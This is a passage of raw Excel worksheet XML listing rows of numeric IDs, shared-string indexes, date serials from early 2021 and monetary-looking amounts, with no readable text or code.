        <v>3763</v>
      </c>
      <c r="G3642" s="1">
        <v>44265</v>
      </c>
      <c r="H3642" s="4">
        <v>50000</v>
      </c>
      <c r="I3642" t="s">
        <v>12934</v>
      </c>
    </row>
    <row r="3643" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3643">
        <v>23860</v>
      </c>
      <c r="B3643">
        <v>1502</v>
      </c>
      <c r="C3643" t="s">
        <v>16512</v>
      </c>
      <c r="D3643" t="s">
        <v>16513</v>
      </c>
      <c r="E3643">
        <v>18</v>
      </c>
      <c r="F3643" t="s">
        <v>6917</v>
      </c>
      <c r="G3643" s="1">
        <v>44265</v>
      </c>
      <c r="H3643" s="4">
        <v>50000</v>
      </c>
      <c r="I3643" t="s">
        <v>12934</v>
      </c>
    </row>
    <row r="3644" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3644">
        <v>23861</v>
      </c>
      <c r="B3644">
        <v>1502</v>
      </c>
      <c r="C3644" t="s">
        <v>16512</v>
      </c>
      <c r="D3644" t="s">
        <v>16513</v>
      </c>
      <c r="E3644">
        <v>18</v>
      </c>
      <c r="F3644" t="s">
        <v>9610</v>
      </c>
      <c r="G3644" s="1">
        <v>44265</v>
      </c>
      <c r="H3644" s="4">
        <v>11000</v>
      </c>
      <c r="I3644" t="s">
        <v>12934</v>
      </c>
    </row>
    <row r="3645" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3645">
        <v>23862</v>
      </c>
      <c r="B3645">
        <v>958</v>
      </c>
      <c r="C3645" t="s">
        <v>16395</v>
      </c>
      <c r="D3645" t="s">
        <v>16496</v>
      </c>
      <c r="E3645">
        <v>16</v>
      </c>
      <c r="F3645" t="s">
        <v>9925</v>
      </c>
      <c r="G3645" s="1">
        <v>44215</v>
      </c>
      <c r="H3645" s="4">
        <v>808500</v>
      </c>
      <c r="J3645" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3646" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3646">
        <v>23863</v>
      </c>
      <c r="B3646">
        <v>1508</v>
      </c>
      <c r="C3646" t="s">
        <v>4180</v>
      </c>
      <c r="D3646" t="s">
        <v>12938</v>
      </c>
      <c r="E3646">
        <v>16</v>
      </c>
      <c r="F3646" t="s">
        <v>364</v>
      </c>
      <c r="G3646" s="1">
        <v>44238</v>
      </c>
      <c r="H3646">
        <v>120000000</v>
      </c>
      <c r="I3646" t="s">
        <v>9522</v>
      </c>
      <c r="J3646" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3647" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3647">
        <v>23864</v>
      </c>
      <c r="B3647">
        <v>2821</v>
      </c>
      <c r="C3647" t="s">
        <v>6047</v>
      </c>
      <c r="D3647" t="s">
        <v>12730</v>
      </c>
      <c r="E3647">
        <v>12</v>
      </c>
      <c r="F3647" t="s">
        <v>12939</v>
      </c>
      <c r="G3647" s="1">
        <v>44224</v>
      </c>
      <c r="H3647">
        <v>6000</v>
      </c>
      <c r="I3647" t="s">
        <v>12940</v>
      </c>
    </row>
    <row r="3648" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3648">
        <v>23866</v>
      </c>
      <c r="B3648">
        <v>1375</v>
      </c>
      <c r="C3648" t="s">
        <v>4000</v>
      </c>
      <c r="D3648" t="s">
        <v>12941</v>
      </c>
      <c r="E3648">
        <v>17</v>
      </c>
      <c r="F3648" t="s">
        <v>2236</v>
      </c>
      <c r="G3648" s="1">
        <v>44229</v>
      </c>
      <c r="H3648">
        <v>5000</v>
      </c>
      <c r="I3648" t="s">
        <v>12942</v>
      </c>
      <c r="J3648" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="3649" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3649">
        <v>23867</v>
      </c>
      <c r="B3649">
        <v>1375</v>
      </c>
      <c r="C3649" t="s">
        <v>4000</v>
      </c>
      <c r="D3649" t="s">
        <v>12941</v>
      </c>
      <c r="E3649">
        <v>17</v>
      </c>
      <c r="F3649" t="s">
        <v>4686</v>
      </c>
      <c r="G3649" s="1">
        <v>44229</v>
      </c>
      <c r="H3649">
        <v>5000</v>
      </c>
      <c r="I3649" t="s">
        <v>12942</v>
      </c>
      <c r="J3649" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="3650" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3650">
        <v>23868</v>
      </c>
      <c r="B3650">
        <v>1375</v>
      </c>
      <c r="C3650" t="s">
        <v>4000</v>
      </c>
      <c r="D3650" t="s">
        <v>12941</v>
      </c>
      <c r="E3650">
        <v>17</v>
      </c>
      <c r="F3650" t="s">
        <v>12944</v>
      </c>
      <c r="G3650" s="1">
        <v>44229</v>
      </c>
      <c r="H3650">
        <v>5000</v>
      </c>
      <c r="I3650" t="s">
        <v>12942</v>
      </c>
      <c r="J3650" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="3651" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3651">
        <v>23869</v>
      </c>
      <c r="B3651">
        <v>1375</v>
      </c>
      <c r="C3651" t="s">
        <v>4000</v>
      </c>
      <c r="D3651" t="s">
        <v>12941</v>
      </c>
      <c r="E3651">
        <v>17</v>
      </c>
      <c r="F3651" t="s">
        <v>12945</v>
      </c>
      <c r="G3651" s="1">
        <v>44229</v>
      </c>
      <c r="H3651">
        <v>5000</v>
      </c>
      <c r="I3651" t="s">
        <v>12942</v>
      </c>
      <c r="J3651" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="3652" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3652">
        <v>23871</v>
      </c>
      <c r="B3652">
        <v>1375</v>
      </c>
      <c r="C3652" t="s">
        <v>4000</v>
      </c>
      <c r="D3652" t="s">
        <v>12941</v>
      </c>
      <c r="E3652">
        <v>17</v>
      </c>
      <c r="F3652" t="s">
        <v>12946</v>
      </c>
      <c r="G3652" s="1">
        <v>44229</v>
      </c>
      <c r="H3652">
        <v>5000</v>
      </c>
      <c r="I3652" t="s">
        <v>12942</v>
      </c>
      <c r="J3652" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="3653" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3653">
        <v>23872</v>
      </c>
      <c r="B3653">
        <v>1375</v>
      </c>
      <c r="C3653" t="s">
        <v>4000</v>
      </c>
      <c r="D3653" t="s">
        <v>12941</v>
      </c>
      <c r="E3653">
        <v>17</v>
      </c>
      <c r="F3653" t="s">
        <v>3814</v>
      </c>
      <c r="G3653" s="1">
        <v>44229</v>
      </c>
      <c r="H3653">
        <v>5000</v>
      </c>
      <c r="I3653" t="s">
        <v>12942</v>
      </c>
      <c r="J3653" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="3654" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3654">
        <v>23873</v>
      </c>
      <c r="B3654">
        <v>1375</v>
      </c>
      <c r="C3654" t="s">
        <v>4000</v>
      </c>
      <c r="D3654" t="s">
        <v>12941</v>
      </c>
      <c r="E3654">
        <v>17</v>
      </c>
      <c r="F3654" t="s">
        <v>1746</v>
      </c>
      <c r="G3654" s="1">
        <v>44229</v>
      </c>
      <c r="H3654">
        <v>5000</v>
      </c>
      <c r="I3654" t="s">
        <v>12942</v>
      </c>
      <c r="J3654" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="3655" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3655">
        <v>23874</v>
      </c>
      <c r="B3655">
        <v>1375</v>
      </c>
      <c r="C3655" t="s">
        <v>4000</v>
      </c>
      <c r="D3655" t="s">
        <v>12941</v>
      </c>
      <c r="E3655">
        <v>17</v>
      </c>
      <c r="F3655" t="s">
        <v>9928</v>
      </c>
      <c r="G3655" s="1">
        <v>44229</v>
      </c>
      <c r="H3655">
        <v>5000</v>
      </c>
      <c r="I3655" t="s">
        <v>12942</v>
      </c>
      <c r="J3655" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="3656" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3656">
        <v>23875</v>
      </c>
      <c r="B3656">
        <v>1375</v>
      </c>
      <c r="C3656" t="s">
        <v>4000</v>
      </c>
      <c r="D3656" t="s">
        <v>12941</v>
      </c>
      <c r="E3656">
        <v>17</v>
      </c>
      <c r="F3656" t="s">
        <v>9595</v>
      </c>
      <c r="G3656" s="1">
        <v>44229</v>
      </c>
      <c r="H3656">
        <v>5000</v>
      </c>
      <c r="I3656" t="s">
        <v>12942</v>
      </c>
      <c r="J3656" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="3657" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3657">
        <v>23876</v>
      </c>
      <c r="B3657">
        <v>1375</v>
      </c>
      <c r="C3657" t="s">
        <v>4000</v>
      </c>
      <c r="D3657" t="s">
        <v>12941</v>
      </c>
      <c r="E3657">
        <v>17</v>
      </c>
      <c r="F3657" t="s">
        <v>9527</v>
      </c>
      <c r="G3657" s="1">
        <v>44229</v>
      </c>
      <c r="H3657">
        <v>5000</v>
      </c>
      <c r="I3657" t="s">
        <v>12942</v>
      </c>
      <c r="J3657" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="3658" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3658">
        <v>23877</v>
      </c>
      <c r="B3658">
        <v>1375</v>
      </c>
      <c r="C3658" t="s">
        <v>4000</v>
      </c>
      <c r="D3658" t="s">
        <v>12941</v>
      </c>
      <c r="E3658">
        <v>17</v>
      </c>
      <c r="F3658" t="s">
        <v>9437</v>
      </c>
      <c r="G3658" s="1">
        <v>44229</v>
      </c>
      <c r="H3658">
        <v>5000</v>
      </c>
      <c r="I3658" t="s">
        <v>12942</v>
      </c>
      <c r="J3658" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="3659" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3659">
        <v>23878</v>
      </c>
      <c r="B3659">
        <v>1375</v>
      </c>
      <c r="C3659" t="s">
        <v>4000</v>
      </c>
      <c r="D3659" t="s">
        <v>12941</v>
      </c>
      <c r="E3659">
        <v>17</v>
      </c>
      <c r="F3659" t="s">
        <v>9675</v>
      </c>
      <c r="G3659" s="1">
        <v>44229</v>
      </c>
      <c r="H3659">
        <v>5000</v>
      </c>
      <c r="I3659" t="s">
        <v>12942</v>
      </c>
      <c r="J3659" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="3660" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3660">
        <v>23879</v>
      </c>
      <c r="B3660">
        <v>1375</v>
      </c>
      <c r="C3660" t="s">
        <v>4000</v>
      </c>
      <c r="D3660" t="s">
        <v>12941</v>
      </c>
      <c r="E3660">
        <v>17</v>
      </c>
      <c r="F3660" t="s">
        <v>9523</v>
      </c>
      <c r="G3660" s="1">
        <v>44229</v>
      </c>
      <c r="H3660">
        <v>5000</v>
      </c>
      <c r="I3660" t="s">
        <v>12942</v>
      </c>
      <c r="J3660" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="3661" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3661">
        <v>23880</v>
      </c>
      <c r="B3661">
        <v>1375</v>
      </c>
      <c r="C3661" t="s">
        <v>4000</v>
      </c>
      <c r="D3661" t="s">
        <v>12941</v>
      </c>
      <c r="E3661">
        <v>17</v>
      </c>
      <c r="F3661" t="s">
        <v>9577</v>
      </c>
      <c r="G3661" s="1">
        <v>44229</v>
      </c>
      <c r="H3661">
        <v>5000</v>
      </c>
      <c r="I3661" t="s">
        <v>12942</v>
      </c>
      <c r="J3661" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="3662" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3662">
        <v>23881</v>
      </c>
      <c r="B3662">
        <v>1375</v>
      </c>
      <c r="C3662" t="s">
        <v>4000</v>
      </c>
      <c r="D3662" t="s">
        <v>12941</v>
      </c>
      <c r="E3662">
        <v>17</v>
      </c>
      <c r="F3662" t="s">
        <v>9435</v>
      </c>
      <c r="G3662" s="1">
        <v>44229</v>
      </c>
      <c r="H3662">
        <v>5000</v>
      </c>
      <c r="I3662" t="s">
        <v>12942</v>
      </c>
      <c r="J3662" t="s">
        <v>12943</v>
      </c>
    </row>
    <row r="3663" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3663">
        <v>23886</v>
      </c>
      <c r="B3663">
        <v>5108</v>
      </c>
      <c r="C3663" t="s">
        <v>8021</v>
      </c>
      <c r="D3663" t="s">
        <v>12947</v>
      </c>
      <c r="E3663">
        <v>12</v>
      </c>
      <c r="F3663" t="s">
        <v>9435</v>
      </c>
      <c r="G3663" s="1">
        <v>44258</v>
      </c>
      <c r="H3663">
        <v>200000</v>
      </c>
    </row>
    <row r="3664" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3664">
        <v>23887</v>
      </c>
      <c r="B3664">
        <v>465</v>
      </c>
      <c r="C3664" t="s">
        <v>240</v>
      </c>
      <c r="D3664" t="s">
        <v>12948</v>
      </c>
      <c r="E3664">
        <v>14</v>
      </c>
      <c r="F3664" t="s">
        <v>9437</v>
      </c>
      <c r="G3664" s="1">
        <v>44265</v>
      </c>
      <c r="H3664">
        <v>20</v>
      </c>
      <c r="J3664" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="3665" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3665">
        <v>23888</v>
      </c>
      <c r="B3665">
        <v>465</v>
      </c>
      <c r="C3665" t="s">
        <v>240</v>
      </c>
      <c r="D3665" t="s">
        <v>12948</v>
      </c>
      <c r="E3665">
        <v>14</v>
      </c>
      <c r="F3665" t="s">
        <v>1746</v>
      </c>
      <c r="G3665" s="1">
        <v>44265</v>
      </c>
      <c r="H3665">
        <v>20</v>
      </c>
      <c r="J3665" t="s">
        <v>10625</v>
      </c>
    </row>
    <row r="3666" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3666">
        <v>23889</v>
      </c>
      <c r="B3666">
        <v>5195</v>
      </c>
      <c r="C3666" t="s">
        <v>8404</v>
      </c>
      <c r="D3666" t="s">
        <v>12949</v>
      </c>
      <c r="E3666">
        <v>4</v>
      </c>
      <c r="F3666" t="s">
        <v>12950</v>
      </c>
      <c r="G3666" s="1">
        <v>44224</v>
      </c>
      <c r="H3666">
        <v>24000</v>
      </c>
      <c r="J3666" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3667" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3667">
        <v>23890</v>
      </c>
      <c r="B3667">
        <v>5195</v>
      </c>
      <c r="C3667" t="s">
        <v>8404</v>
      </c>
      <c r="D3667" t="s">
        <v>12949</v>
      </c>
      <c r="E3667">
        <v>4</v>
      </c>
      <c r="F3667" t="s">
        <v>12951</v>
      </c>
      <c r="G3667" s="1">
        <v>44224</v>
      </c>
      <c r="H3667">
        <v>24000</v>
      </c>
      <c r="J3667" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3668" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3668">
        <v>23891</v>
      </c>
      <c r="B3668">
        <v>5195</v>
      </c>
      <c r="C3668" t="s">
        <v>8404</v>
      </c>
      <c r="D3668" t="s">
        <v>12949</v>
      </c>
      <c r="E3668">
        <v>4</v>
      </c>
      <c r="F3668" t="s">
        <v>9472</v>
      </c>
      <c r="G3668" s="1">
        <v>44224</v>
      </c>
      <c r="H3668">
        <v>4800</v>
      </c>
      <c r="J3668" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3669" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3669">
        <v>23892</v>
      </c>
      <c r="B3669">
        <v>5195</v>
      </c>
      <c r="C3669" t="s">
        <v>8404</v>
      </c>
      <c r="D3669" t="s">
        <v>12949</v>
      </c>
      <c r="E3669">
        <v>4</v>
      </c>
      <c r="F3669" t="s">
        <v>3814</v>
      </c>
      <c r="G3669" s="1">
        <v>44224</v>
      </c>
      <c r="H3669">
        <v>24000</v>
      </c>
      <c r="J3669" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3670" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3670">
        <v>23893</v>
      </c>
      <c r="B3670">
        <v>5195</v>
      </c>
      <c r="C3670" t="s">
        <v>8404</v>
      </c>
      <c r="D3670" t="s">
        <v>12949</v>
      </c>
      <c r="E3670">
        <v>4</v>
      </c>
      <c r="F3670" t="s">
        <v>7057</v>
      </c>
      <c r="G3670" s="1">
        <v>44224</v>
      </c>
      <c r="H3670">
        <v>9600</v>
      </c>
      <c r="J3670" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="3671" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3671">
        <v>23897</v>
      </c>
      <c r="B3671">
        <v>5256</v>
      </c>
      <c r="C3671" t="s">
        <v>8398</v>
      </c>
      <c r="D3671" t="s">
        <v>12952</v>
      </c>
      <c r="E3671">
        <v>13</v>
      </c>
      <c r="F3671" t="s">
        <v>12953</v>
      </c>
      <c r="G3671" s="1">
        <v>44285</v>
      </c>
      <c r="H3671">
        <v>105416</v>
      </c>
      <c r="I3671" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="3672" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3672">
        <v>23898</v>
      </c>
      <c r="B3672">
        <v>5256</v>
      </c>
      <c r="C3672" t="s">
        <v>8398</v>
      </c>
      <c r="D3672" t="s">
        <v>12952</v>
      </c>
      <c r="E3672">
        <v>13</v>
      </c>
      <c r="F3672" t="s">
        <v>12954</v>
      </c>
      <c r="G3672" s="1">
        <v>44285</v>
      </c>
      <c r="H3672">
        <v>491</v>
      </c>
      <c r="I3672" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="3673" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3673">
        <v>23899</v>
      </c>
      <c r="B3673">
        <v>5256</v>
      </c>
      <c r="C3673" t="s">
        <v>8398</v>
      </c>
      <c r="D3673" t="s">
        <v>12952</v>
      </c>
      <c r="E3673">
        <v>13</v>
      </c>
      <c r="F3673" t="s">
        <v>9438</v>
      </c>
      <c r="G3673" s="1">
        <v>44285</v>
      </c>
      <c r="H3673">
        <v>281433</v>
      </c>
      <c r="I3673" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="3674" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3674">
        <v>23900</v>
      </c>
      <c r="B3674">
        <v>5256</v>
      </c>
      <c r="C3674" t="s">
        <v>8398</v>
      </c>
      <c r="D3674" t="s">
        <v>12952</v>
      </c>
      <c r="E3674">
        <v>13</v>
      </c>
      <c r="F3674" t="s">
        <v>2924</v>
      </c>
      <c r="G3674" s="1">
        <v>44285</v>
      </c>
      <c r="H3674">
        <v>1639201</v>
      </c>
      <c r="I3674" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="3675" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3675">
        <v>23901</v>
      </c>
      <c r="B3675">
        <v>5256</v>
      </c>
      <c r="C3675" t="s">
        <v>8398</v>
      </c>
      <c r="D3675" t="s">
        <v>12952</v>
      </c>
      <c r="E3675">
        <v>13</v>
      </c>
      <c r="F3675" t="s">
        <v>12955</v>
      </c>
      <c r="G3675" s="1">
        <v>44285</v>
      </c>
      <c r="H3675">
        <v>5000</v>
      </c>
      <c r="I3675" t="s">
        <v>12956</v>
      </c>
    </row>
    <row r="3676" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3676">
        <v>23902</v>
      </c>
      <c r="B3676">
        <v>5256</v>
      </c>
      <c r="C3676" t="s">
        <v>8398</v>
      </c>
      <c r="D3676" t="s">
        <v>12952</v>
      </c>
      <c r="E3676">
        <v>13</v>
      </c>
      <c r="F3676" t="s">
        <v>12957</v>
      </c>
      <c r="G3676" s="1">
        <v>44285</v>
      </c>
      <c r="H3676">
        <v>500</v>
      </c>
      <c r="I3676" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="3677" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3677">
        <v>23903</v>
      </c>
      <c r="B3677">
        <v>5256</v>
      </c>
      <c r="C3677" t="s">
        <v>8398</v>
      </c>
      <c r="D3677" t="s">
        <v>12952</v>
      </c>
      <c r="E3677">
        <v>13</v>
      </c>
      <c r="F3677" t="s">
        <v>1746</v>
      </c>
      <c r="G3677" s="1">
        <v>44285</v>
      </c>
      <c r="H3677">
        <v>331540</v>
      </c>
      <c r="I3677" t="s">
        <v>10029</v>
      </c>
      <c r="J3677" t="s">
        <v>9709</v>
      </c>
    </row>
    <row r="3678" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3678">
        <v>23904</v>
      </c>
      <c r="B3678">
        <v>5256</v>
      </c>
      <c r="C3678" t="s">
        <v>8398</v>
      </c>
      <c r="D3678" t="s">
        <v>12952</v>
      </c>
      <c r="E3678">
        <v>13</v>
      </c>
      <c r="F3678" t="s">
        <v>7241</v>
      </c>
      <c r="G3678" s="1">
        <v>44285</v>
      </c>
      <c r="H3678">
        <v>18000</v>
      </c>
      <c r="I3678" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="3679" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3679">
        <v>23905</v>
      </c>
      <c r="B3679">
        <v>5256</v>
      </c>
      <c r="C3679" t="s">
        <v>8398</v>
      </c>
      <c r="D3679" t="s">
        <v>12952</v>
      </c>
      <c r="E3679">
        <v>13</v>
      </c>
      <c r="F3679" t="s">
        <v>9672</v>
      </c>
      <c r="G3679" s="1">
        <v>44285</v>
      </c>
      <c r="H3679">
        <v>18000</v>
      </c>
      <c r="I3679" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="3680" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3680">
        <v>23906</v>
      </c>
      <c r="B3680">
        <v>5257</v>
      </c>
      <c r="C3680" t="s">
        <v>8411</v>
      </c>
      <c r="D3680" t="s">
        <v>12958</v>
      </c>
      <c r="E3680">
        <v>23</v>
      </c>
      <c r="F3680" t="s">
        <v>364</v>
      </c>
      <c r="G3680" s="1">
        <v>44244</v>
      </c>
      <c r="H3680">
        <v>200</v>
      </c>
      <c r="J3680" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3681" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3681">
        <v>23908</v>
      </c>
      <c r="B3681">
        <v>761</v>
      </c>
      <c r="C3681" t="s">
        <v>1993</v>
      </c>
      <c r="D3681" t="s">
        <v>12131</v>
      </c>
      <c r="E3681">
        <v>17</v>
      </c>
      <c r="F3681" t="s">
        <v>12959</v>
      </c>
      <c r="G3681" s="1">
        <v>44217</v>
      </c>
      <c r="H3681">
        <v>50000</v>
      </c>
      <c r="I3681" t="s">
        <v>12132</v>
      </c>
      <c r="J3681" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="3682" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3682">
        <v>23909</v>
      </c>
      <c r="B3682">
        <v>761</v>
      </c>
      <c r="C3682" t="s">
        <v>1993</v>
      </c>
      <c r="D3682" t="s">
        <v>12131</v>
      </c>
      <c r="E3682">
        <v>17</v>
      </c>
      <c r="F3682" t="s">
        <v>12960</v>
      </c>
      <c r="G3682" s="1">
        <v>44217</v>
      </c>
      <c r="H3682">
        <v>24000</v>
      </c>
      <c r="I3682" t="s">
        <v>12132</v>
      </c>
      <c r="J3682" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="3683" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3683">
        <v>23911</v>
      </c>
      <c r="B3683">
        <v>1565</v>
      </c>
      <c r="C3683" t="s">
        <v>3382</v>
      </c>
      <c r="D3683" t="s">
        <v>11682</v>
      </c>
      <c r="E3683">
        <v>5</v>
      </c>
      <c r="F3683" t="s">
        <v>9672</v>
      </c>
      <c r="G3683" s="1">
        <v>44232</v>
      </c>
      <c r="H3683">
        <v>75000</v>
      </c>
      <c r="I3683" t="s">
        <v>10222</v>
      </c>
      <c r="J3683" t="s">
        <v>12961</v>
      </c>
    </row>
    <row r="3684" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3684">
        <v>23912</v>
      </c>
      <c r="B3684">
        <v>1565</v>
      </c>
      <c r="C3684" t="s">
        <v>3382</v>
      </c>
      <c r="D3684" t="s">
        <v>11682</v>
      </c>
      <c r="E3684">
        <v>5</v>
      </c>
      <c r="F3684" t="s">
        <v>7241</v>
      </c>
      <c r="G3684" s="1">
        <v>44232</v>
      </c>
      <c r="H3684">
        <v>75000</v>
      </c>
      <c r="I3684" t="s">
        <v>10222</v>
      </c>
      <c r="J3684" t="s">
        <v>12961</v>
      </c>
    </row>
    <row r="3685" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3685">
        <v>23914</v>
      </c>
      <c r="B3685">
        <v>597</v>
      </c>
      <c r="C3685" t="s">
        <v>16482</v>
      </c>
      <c r="D3685" t="s">
        <v>16483</v>
      </c>
      <c r="E3685">
        <v>13</v>
      </c>
      <c r="F3685" t="s">
        <v>12962</v>
      </c>
      <c r="G3685" s="1">
        <v>44221</v>
      </c>
      <c r="H3685" s="4">
        <v>15000</v>
      </c>
      <c r="I3685" t="s">
        <v>12963</v>
      </c>
    </row>
    <row r="3686" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3686">
        <v>23915</v>
      </c>
      <c r="B3686">
        <v>42</v>
      </c>
      <c r="C3686" t="s">
        <v>16506</v>
      </c>
      <c r="D3686" t="s">
        <v>16507</v>
      </c>
      <c r="E3686">
        <v>12</v>
      </c>
      <c r="F3686" t="s">
        <v>609</v>
      </c>
      <c r="G3686" s="1">
        <v>44231</v>
      </c>
      <c r="H3686" s="4">
        <v>216000</v>
      </c>
      <c r="J3686" t="s">
        <v>11473</v>
      </c>
    </row>
    <row r="3687" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3687">
        <v>23916</v>
      </c>
      <c r="B3687">
        <v>42</v>
      </c>
      <c r="C3687" t="s">
        <v>16506</v>
      </c>
      <c r="D3687" t="s">
        <v>16507</v>
      </c>
      <c r="E3687">
        <v>12</v>
      </c>
      <c r="F3687" t="s">
        <v>2236</v>
      </c>
      <c r="G3687" s="1">
        <v>44231</v>
      </c>
      <c r="H3687" s="4">
        <v>20000</v>
      </c>
      <c r="J3687" t="s">
        <v>12964</v>
      </c>
    </row>
    <row r="3688" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3688">
        <v>23918</v>
      </c>
      <c r="B3688">
        <v>1414</v>
      </c>
      <c r="C3688" t="s">
        <v>4209</v>
      </c>
      <c r="D3688" t="s">
        <v>12965</v>
      </c>
      <c r="E3688">
        <v>16</v>
      </c>
      <c r="F3688" t="s">
        <v>364</v>
      </c>
      <c r="G3688" s="1">
        <v>44279</v>
      </c>
      <c r="H3688">
        <v>5810000</v>
      </c>
      <c r="I3688" t="s">
        <v>11160</v>
      </c>
      <c r="J3688" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3689" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3689">
        <v>23919</v>
      </c>
      <c r="B3689">
        <v>2345</v>
      </c>
      <c r="C3689" t="s">
        <v>16515</v>
      </c>
      <c r="D3689" t="s">
        <v>16516</v>
      </c>
      <c r="E3689">
        <v>29</v>
      </c>
      <c r="F3689" t="s">
        <v>12966</v>
      </c>
      <c r="G3689" s="1">
        <v>44232</v>
      </c>
      <c r="H3689" s="4">
        <v>100000</v>
      </c>
      <c r="I3689" t="s">
        <v>12967</v>
      </c>
      <c r="J3689" t="s">
        <v>12968</v>
      </c>
    </row>
    <row r="3690" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3690">
        <v>23920</v>
      </c>
      <c r="B3690">
        <v>2345</v>
      </c>
      <c r="C3690" t="s">
        <v>4803</v>
      </c>
      <c r="D3690" t="s">
        <v>9607</v>
      </c>
      <c r="E3690">
        <v>29</v>
      </c>
      <c r="F3690" t="s">
        <v>12969</v>
      </c>
      <c r="G3690" s="1">
        <v>44232</v>
      </c>
      <c r="H3690">
        <v>100000</v>
      </c>
      <c r="I3690" t="s">
        <v>12967</v>
      </c>
      <c r="J3690" t="s">
        <v>12968</v>
      </c>
    </row>
    <row r="3691" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3691">
        <v>23921</v>
      </c>
      <c r="B3691">
        <v>2345</v>
      </c>
      <c r="C3691" t="s">
        <v>4803</v>
      </c>
      <c r="D3691" t="s">
        <v>9607</v>
      </c>
      <c r="E3691">
        <v>29</v>
      </c>
      <c r="F3691" t="s">
        <v>9437</v>
      </c>
      <c r="G3691" s="1">
        <v>44232</v>
      </c>
      <c r="H3691">
        <v>100000</v>
      </c>
      <c r="I3691" t="s">
        <v>12967</v>
      </c>
      <c r="J3691" t="s">
        <v>12968</v>
      </c>
    </row>
    <row r="3692" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3692">
        <v>23922</v>
      </c>
      <c r="B3692">
        <v>1720</v>
      </c>
      <c r="C3692" t="s">
        <v>6402</v>
      </c>
      <c r="D3692" t="s">
        <v>12970</v>
      </c>
      <c r="E3692">
        <v>24</v>
      </c>
      <c r="F3692" t="s">
        <v>1746</v>
      </c>
      <c r="G3692" s="1">
        <v>44291</v>
      </c>
      <c r="H3692">
        <v>570000</v>
      </c>
      <c r="I3692" t="s">
        <v>9536</v>
      </c>
    </row>
    <row r="3693" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3693">
        <v>23925</v>
      </c>
      <c r="B3693">
        <v>1435</v>
      </c>
      <c r="C3693" t="s">
        <v>3187</v>
      </c>
      <c r="D3693" t="s">
        <v>11700</v>
      </c>
      <c r="E3693">
        <v>16</v>
      </c>
      <c r="F3693" t="s">
